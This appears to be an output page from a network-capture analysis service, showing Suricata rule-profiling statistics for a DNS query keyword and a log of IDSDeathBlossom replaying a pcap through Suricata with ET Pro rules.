  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: dns_query
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5628            1               1               5628            5628.00         5628.00         0.00           


unified2.alert.1564034256 - (39229 bytes) - download

This file has been truncated. Go here to download in full.


IDSDeathBlossom.py.log - (1203 bytes) - download
2019-07-25 05:57:13,884 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-07-25 05:57:14,611 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-07-25 05:57:14,611 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-07-25 05:57:14,612 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-07-25 05:57:14,612 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-07-25 05:57:14,612 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/04c847a258b82858fa76434ef923317756b33745cb75ec8c950e11a498e082d2 -r /var/pcap/07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap -vvv -k none
2019-07-25 05:57:36,738 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-07-25 05:57:36,738 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 22.863437891